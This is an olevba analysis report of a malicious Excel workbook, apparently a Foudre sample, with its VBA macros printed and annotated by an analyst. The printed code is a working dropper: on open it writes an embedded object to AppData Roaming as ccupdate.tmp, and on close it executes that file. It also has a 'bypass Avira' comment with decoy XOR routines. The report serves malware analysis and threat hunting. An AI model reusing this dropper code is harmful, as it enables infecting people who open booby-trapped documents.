olevba 0.55.1 on Python 2.7.16 - http://decalage.info/python/oletools
===============================================================================
FILE: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Module-level string in ThisWorkbook. Workbook_BeforeClose assigns it (as fpath$)
' the path of the file it then passes to Shell.
Public fpath As String
' NOTE(review): the author's remark below appears to describe WinNtVersion, which follows it.
'does not work correctly
Public Function WinNtVersion()
' Host fingerprinting helper: returns the Version property of Win32_OperatingSystem,
' read through a WMI query.
' No return type is declared, so the result is a Variant. If the query yields more than
' one instance, the value from the last one is returned.
Dim objWMI As Object
Dim objSystems As Object
Dim objOs As Object
' WMI moniker for the root\cimv2 namespace on the local machine ("."), requesting the
' "impersonate" impersonation level.
' NOTE(review): the string literal is split over two lines here; this looks like the
' report's line wrapping rather than something the macro author wrote - confirm against the sample.
Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\
cimv2")
Set objSystems = objWMI.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOs In objSystems
'MsgBox "O/S Name : " & objOs.Caption & " / " & objOs.Version
WinNtVersion = objOs.Version
Next
' Release the COM references.
Set objOs = Nothing
Set objSystems = Nothing
Set objWMI = Nothing
End Function
Private Sub Workbook_Open()
' Auto-exec entry point: Excel raises this event when the workbook is opened.
' Analyst summary: the first action is SaveExeFile (the drop stage); the remaining checks
' only display message boxes and do not gate the drop.
' Any runtime error jumps to Er3, where the Sub ends without reporting anything.
On Error GoTo Er3:
SaveExeFile
' NOTE(review): "System" is not declared in any module shown in this report. If it does not
' resolve at run time, this line raises and control goes straight to Er3 - confirm.
If InStr(System.OperatingSystem, "Windows") <> 0 Then
' ContentMode
Else
MsgBox "Please open this document in Windows Operating System"
End If
' Compares the WMI OS version with 2 and shows a test message box. This looks like leftover
' development code; the author's comment above WinNtVersion says it does not work correctly.
If WinNtVersion < 2 Then 'bypass
MsgBox "helooo"
End If
Er3:
End Sub
Function IsFile(ByVal fName As String) As Boolean
' Helper that is not called by any routine visible in this report.
'Returns TRUE if the provided name points to an existing file.
'Returns FALSE if not existing, or if it's a folder
' Errors are suppressed: if GetAttr raises, the assignment below is skipped and IsFile
' keeps its default value, False.
On Error Resume Next
IsFile = ((GetAttr(fName) And vbDirectory) <> vbDirectory)
End Function
'after each update rename tmp file
'Used names
'euupdate.tmp
'EZUpdate.tmp
'cqupdate.tmp
Sub SaveExeFile()
' Drop stage, called from Workbook_Open. Writes the object embedded in Sheet1 into a
' folder in the user profile by copying it to the clipboard and pasting it with a shell verb.
' Analyst notes:
' - The file is written through the clipboard and the Shell.Application "Paste" verb, so the
'   macro contains no VBA file-write statements.
' - The comment block preceding this Sub lists earlier *.tmp names used by the author;
'   this build uses ccupdate.tmp. Treat the names as indicators for hunting.
' All errors are ignored, so a failing step does not stop the later ones.
On Error Resume Next
' Rewrites the TEMP path by replacing "Local\Temp" with "Roaming".
' presumably this yields the user's AppData\Roaming folder - verify on the target OS.
stpath = Replace(Environ("temp"), "Local\Temp", "Roaming")
' Delete any copy left by a previous run.
Kill (stpath) + "\ccupdate.tmp"
'Sheets("Sheet1").OLEObjects("Object 1").Copy
' Copy the first embedded OLE object on Sheet1 to the clipboard.
Sheets("Sheet1").OLEObjects(1).Copy
' Wait three seconds, yielding to the message loop with DoEvents.
waitTill = Now() + TimeValue("00:00:03")
While Now() < waitTill
DoEvents
Wend
' Paste the clipboard content into the stpath folder via the shell.
' NOTE(review): the resulting file name is not set in this Sub. It presumably comes from the
' embedded object and matches ccupdate.tmp, the name Workbook_BeforeClose executes - confirm.
CreateObject("Shell.Application").Namespace(stpath).Self.InvokeVerb "Paste"
' fpath$ = stpath + "\ccupdate.tmp"
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
' Execution stage: Excel raises this event when the workbook is about to close.
' Analyst notes:
' - The dropped file is executed at close time, not at open time. An analysis run that
'   opens the document but never closes it will not observe this step.
' - olevba's summary table lists only Workbook_Open as AutoExec, although this handler
'   also runs automatically.
' Any runtime error jumps to Er4.
On Error GoTo Er4:
' Same path construction as SaveExeFile: TEMP with "Local\Temp" replaced by "Roaming".
stpath = Replace(Environ("temp"), "Local\Temp", "Roaming")
fpath$ = stpath + "\ccupdate.tmp"
' Run the dropped file.
Shell fpath$
'prevent warning empty clipboard
ClearClipboard
' Do not cancel the close.
Cancel = False
Er4:
' Reached on both the normal and the error path.
' presumably resolves to the workbook's Saved property, so Excel closes without a save prompt - confirm.
Saved = True
End Sub
Sub ClearClipboard()
' Replaces the clipboard content with an empty string. Called from Workbook_BeforeClose
' after the dropped file is run, which also removes the OLE object that SaveExeFile
' copied to the clipboard.
' NOTE(review): DataObject is not declared in this report; it is presumably the
' Microsoft Forms type, which needs a project reference - confirm.
Dim MyData As DataObject
Set MyData = New DataObject
MyData.SetText ""
MyData.PutInClipboard
End Sub
' bypass Avira manuall Scan
Sub Dec()
' Passes a hard-coded string and the key "KALLOBANK" to XorC and shows the result in a
' message box. Not called by any routine visible in this report.
' NOTE(review): XorC is not defined in any module shown here, so its behaviour cannot be
' confirmed. Dec1 to Dec4 are byte-for-byte copies of this body; together with the
' author's "bypass Avira" comment above, they look like padding intended to change how
' the file scans - an inference to confirm.
Dim sKey As String
Dim payload As String
Dim Value As String
sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("
Value = XorC(payload, sKey)
MsgBox Value
End Sub
Sub Dec1()
' Same body as Dec: hands a hard-coded string and the key "KALLOBANK" to XorC and shows
' the result. Not called by any routine visible in this report.
' NOTE(review): XorC is not defined in the modules shown here.
Dim sKey As String
Dim payload As String
Dim Value As String
sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("
Value = XorC(payload, sKey)
MsgBox Value
End Sub
Sub Dec2()
' Same body as Dec: hands a hard-coded string and the key "KALLOBANK" to XorC and shows
' the result. Not called by any routine visible in this report.
' NOTE(review): XorC is not defined in the modules shown here.
Dim sKey As String
Dim payload As String
Dim Value As String
sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("
Value = XorC(payload, sKey)
MsgBox Value
End Sub
Sub Dec3()
' Same body as Dec: hands a hard-coded string and the key "KALLOBANK" to XorC and shows
' the result. Not called by any routine visible in this report.
' NOTE(review): XorC is not defined in the modules shown here.
Dim sKey As String
Dim payload As String
Dim Value As String
sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("
Value = XorC(payload, sKey)
MsgBox Value
End Sub
Sub Dec4()
' Same body as Dec: hands a hard-coded string and the key "KALLOBANK" to XorC and shows
' the result. Not called by any routine visible in this report.
' NOTE(review): XorC is not defined in the modules shown here.
Dim sKey As String
Dim payload As String
Dim Value As String
sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("
Value = XorC(payload, sKey)
MsgBox Value
End Sub
Sub GetValue()
' Prompts for a name with Application.InputBox and echoes it in a message box.
' Not called by any routine visible in this report; it has no file, process or network activity.
Dim name As String
name = Application.InputBox("Please enter your name")
MsgBox "your name is: " + name
End Sub
Sub GetValue2()
' Shows a fixed message box. Not called by any routine visible in this report.
MsgBox "1111111"
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/Sheet2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'************************************************************************
' Full VBA Course: https://www.teachexcel.com/vba-course-update.php
'************************************************************************
' Excel VBA Tutorial - https://www.TeachExcel.com
'
' Hide Worksheets Using a Password
'
' Specific Sheets will not be visible until the user enters the correct password.
'
' If you don't password protect the project, the user can still unhide the
' worksheet.
'
' Password Protect the Project: Right-click the Project in the Project Explorer >
' VBAProject Properties > Protection tab > check Lock project for viewing and
' input a password and hit OK.
Option Explicit ' Require that variables are declared.
' The Password
' A global constant value allows you to store this password once for your entire
' project and use it wherever you need to check for the password. This ensures
' that you only have to change the password in one place in the future.
' NOTE(review): the password is stored in clear text in the macro source, and this report
' shows that olevba extracts it. It provides no confidentiality for the hidden sheet.
Public Const conSheetPassword As String = "abcxyz456"
Sub ViewSheet()
' Code from: https://www.TeachExcel.com
'
' Unlock/show the worksheet if the user inputs the correct password.
' NOTE(review): this module carries the tutorial's own comments and nothing in the
' ThisWorkbook code shown in this report calls it. Whether it is filler or used
' interactively cannot be told from here.
' Variables.
Dim userInput As Variant
' Ask the user for the password to unlock the sheet.
userInput = InputBox( _
Prompt:="Input the password to unlock the worksheets.", _
Title:="Password Input", _
Default:="Password")
' Check if the correct password was input.
' - Trim() removes any space that might have been accidentally added to the
' start or end of the password.
' - LCase() ensures that a case-insensitive check is being performed because
' it converts the input and the password both to lower case.
If LCase(Trim(userInput)) = LCase(conSheetPassword) Then
' Pass - all is good.
' Show the Sheet.
'Sheets("Helper").Visible = xlSheetVisible
Sheets("Raw").Visible = xlSheetVisible
' Go to the sheet.
Sheets("Raw").Select
Else
' Fail - wrong password.
' Let the user know.
MsgBox "Incorrect password. Access Denied."
End If
End Sub
Sub HideSheet()
' Code from: https://www.TeachExcel.com
'
' Hide the worksheet so that the user cannot unhide it by hand.
'
' If you don't password protect the project, the user can still unhide the
' worksheet.
'
' Password Protect the Project: Right-click the Project in the Project Explorer >
' VBAProject Properties > Protection tab > check Lock project for viewing and
' input a password and hit OK.
' Hide the sheet so the user can't unhide it by hand (so long as the Project
' code here is also password protected).
' NOTE(review): xlSheetVeryHidden only hides the "Raw" sheet from the Excel UI; the sheet
' content stays in the file and should still be examined during analysis.
'Sheets("Helper").Visible = xlSheetVeryHidden
Sheets("Raw").Visible = xlSheetVeryHidden
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |Workbook_Open |Runs when the Excel Workbook is opened |
|Suspicious|Kill |May delete a file |
|Suspicious|Shell.Application |May run an application (if combined with |
| | |CreateObject) |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|open |May open a file |
|Suspicious|Windows |May enumerate application windows (if |
| | |combined with Shell.Application object) |
|Suspicious|System |May run an executable file or a system |
| | |command on a Mac (if combined with |
| | |libc.dylib) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |https://www.teachexc|URL |
| |el.com/vba-course- | |
| |update.php | |
|IOC |https://www.TeachExc|URL |
| |el.com | |
+----------+--------------------+---------------------------------------------+